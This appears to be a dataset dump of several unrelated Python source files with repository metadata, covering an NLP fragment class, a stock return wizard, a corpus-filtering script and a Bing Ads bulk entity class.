        # cou = number of link-less (root) objects, vcou = how many are verbs.
        cou = 0
        vcou = 0
        for o in self.__m_graph.objects:
            if (len(o.links_to) == 0):
                if (o.typ == SemObjectType.VERB):
                    vcou += 1
                cou += 1
        if (cou <= 1):
            return False
        return vcou < cou

    @property
    def spelling(self) -> str:
        """Text of the fragment (original letter case is kept)."""
        return MiscHelper.get_text_value(self.begin_token, self.end_token, GetTextAttr.KEEPREGISTER)

    @property
    def begin_char(self) -> int:
        # 0 when the fragment has no begin token yet.
        return (0 if self.begin_token is None else self.begin_token.begin_char)

    @property
    def end_char(self) -> int:
        # 0 when the fragment has no end token yet.
        return (0 if self.end_token is None else self.end_token.end_char)

    def __str__(self) -> str:
        # "TYPE: text" once classified, otherwise just the text ("?" if empty).
        if (self.typ != SemFragmentType.UNDEFINED):
            return "{0}: {1}".format(Utils.enumToString(self.typ), Utils.ifNotNull(self.spelling, "?"))
        else:
            return Utils.ifNotNull(self.spelling, "?")
return Utils.ifNotNull(self.spelling, "?") | [
"[email protected]"
]
| |
a39f0bac82f84873a6dbf8cfd3f6a437ad45d06c | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/stock_account/wizard/stock_picking_return.py | 5d54d201e6b6a357cd694038a75f20b33ff45cc4 | []
| no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,299 | py | # -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from harpiya import api, fields, models
class StockReturnPicking(models.TransientModel):
    """Return-picking wizard extension that propagates the 'to_refund' flag."""
    _inherit = "stock.return.picking"

    @api.model
    def default_get(self, default_fields):
        """Pre-check "Update quantities on SO/PO" on every proposed return line.

        Each entry of ``product_return_moves`` is unpacked as a command
        triple ``(i, k, vals)`` and ``vals`` is mutated in place to default
        ``to_refund`` to True.
        """
        # NOTE(review): assumes every triple carries a dict as its third
        # element — TODO confirm no other one2many command codes appear here.
        res = super(StockReturnPicking, self).default_get(default_fields)
        for i, k, vals in res.get('product_return_moves', []):
            vals.update({'to_refund': True})
        return res

    def _create_returns(self):
        """Create the return picking, then copy each wizard line's
        ``to_refund`` choice onto the corresponding new stock move.

        Returns the ``(new_picking_id, pick_type_id)`` pair from super().
        """
        new_picking_id, pick_type_id = super(StockReturnPicking, self)._create_returns()
        new_picking = self.env['stock.picking'].browse([new_picking_id])
        for move in new_picking.move_lines:
            # Match the created move back to its wizard line through the
            # original (returned) move it was generated from.
            return_picking_line = self.product_return_moves.filtered(lambda r: r.move_id == move.origin_returned_move_id)
            if return_picking_line and return_picking_line.to_refund:
                move.to_refund = True
        return new_picking_id, pick_type_id
class StockReturnPickingLine(models.TransientModel):
    """Adds the per-line 'to_refund' option to the return-picking wizard."""
    _inherit = "stock.return.picking.line"

    # Whether returning this line should also decrease the delivered/received
    # quantity on the linked Sale/Purchase order (enabled by default).
    to_refund = fields.Boolean(string="Update quantities on SO/PO", default=True,
        help='Trigger a decrease of the delivered/received quantity in the associated Sale Order/Purchase Order')
| [
"[email protected]"
]
| |
f9ae3dfa9e5cae2982f31a833e426773e239ed40 | e77732bce61e7e97bad5cee1b07d1b5f9b6fa590 | /cat/utils/data/exclude_corpus.py | 08cc3af28cfc90a11efade2a6bdf4941e1369fb7 | [
"Apache-2.0"
]
| permissive | entn-at/CAT | 9f28f5ff75b37ac90baf63609226deb99d73dbe2 | fc74841e8f6b7eb2f2f88bb7c09b30ad5a8c16f4 | refs/heads/master | 2023-04-10T13:32:31.333889 | 2023-02-27T16:50:43 | 2023-02-27T17:29:07 | 236,718,892 | 0 | 0 | null | 2020-01-28T11:24:01 | 2020-01-28T11:24:00 | null | UTF-8 | Python | false | false | 2,432 | py | # Author: Huahuan Zheng ([email protected])
#
# Fetch n lines from source corpus and exclude part of the source if needed.
#
import sys
import os
import argparse
def _uid_of(line):
    """Return the utterance id: the first whitespace-delimited field of *line*
    (the whole line when it contains no space or tab)."""
    if ' ' in line or '\t' in line:
        uid, _ = line.split(maxsplit=1)
        return uid
    return line


def _load_excluded(path):
    """Read *path* (skipped when None) and return the set of ids to exclude."""
    excluded = set()
    if path is not None:
        with open(path, 'r') as fi:
            for line in fi:
                excluded.add(_uid_of(line.strip()))
    return excluded


def main(argv=None):
    """Fetch up to N lines from a corpus, skipping ids from --exclude-corpus.

    Surviving lines are written to stdout.  *argv* defaults to sys.argv[1:],
    so command-line behavior is unchanged; passing an explicit list makes the
    script testable.  Previously this was one monolithic __main__ block with
    duplicated id-parsing logic, an unclosed file handle in the line count,
    and a typo ('valud') in an error message.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("corpus", type=str,
                        help="Path to the source text corpus.")
    parser.add_argument("--exclude-corpus", type=str, dest="f_exc",
                        help="Add this option if you want to exclude it from source corpus, take first column as index.")
    parser.add_argument("-n", "--num-lines", type=int,
                        help="Number of lines to be prepared, if not specified, would take all of them (after excluded).")
    args = parser.parse_args(argv)

    if not os.path.isfile(args.corpus):
        raise FileNotFoundError(f"--corpus={args.corpus} is not a valid file.")
    if args.f_exc is not None and not os.path.isfile(args.f_exc):
        raise FileNotFoundError(
            f"--exclude-corpus={args.f_exc} is not a valid file.")

    if args.num_lines is not None:
        if args.num_lines < 0:
            raise ValueError(
                f"--num-lines={args.num_lines} < 0 is invalid, expected value >= 0")
        num_lines = args.num_lines
    else:
        # Upper bound only: fewer lines may be emitted once ids are excluded.
        with open(args.corpus, 'r') as fi:
            num_lines = sum(1 for _ in fi)

    excluding_list = _load_excluded(args.f_exc)

    cnt = 0
    with open(args.corpus, 'r') as fi:
        try:
            for line in fi:
                line = line.strip()
                if _uid_of(line) in excluding_list:
                    continue
                if cnt >= num_lines:
                    break
                sys.stdout.write(f"{line}\n")
                cnt += 1
        except IOError:
            # Best effort: a closed downstream pipe (e.g. `... | head`) is
            # not an error for this tool.
            exit(0)

    if cnt < num_lines and args.num_lines is not None:
        raise RuntimeError(
            f"Source corpus text doesn't have enough unique lines to export: {cnt} in total, expect {num_lines}")


if __name__ == "__main__":
    main()
| [
"[email protected]"
]
| |
6c249c704fb9dcad286b896aac14b4023e741304 | 98dbb9cd9523809b4ee0e6b92334fa6a2a6af2a3 | /bingads/v13/bulk/entities/audiences/bulk_campaign_negative_product_audience_association.py | 80d8c4fc61c6babc61466c3ac50597c9c0a847f1 | [
"MIT"
]
| permissive | BingAds/BingAds-Python-SDK | a2f9b0c099b574a4495d0052218f263af55cdb32 | 373a586402bf24af7137b7c49321dbc70c859fce | refs/heads/main | 2023-07-27T15:31:41.354708 | 2023-07-10T03:21:03 | 2023-07-10T03:21:03 | 31,927,550 | 105 | 182 | NOASSERTION | 2023-09-04T06:51:20 | 2015-03-09T23:09:01 | Python | UTF-8 | Python | false | false | 586 | py | from bingads.v13.bulk.entities.audiences.bulk_campaign_negative_audience_association import *
class BulkCampaignNegativeProductAudienceAssociation(BulkCampaignNegativeAudienceAssociation):
""" Represents an Campaign Negative Product Audience Association that can be read or written in a bulk file.
For more information, see Campaign Negative Product Audience Association at https://go.microsoft.com/fwlink/?linkid=846127.
*See also:*
* :class:`.BulkServiceManager`
* :class:`.BulkOperation`
* :class:`.BulkFileReader`
* :class:`.BulkFileWriter`
"""
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.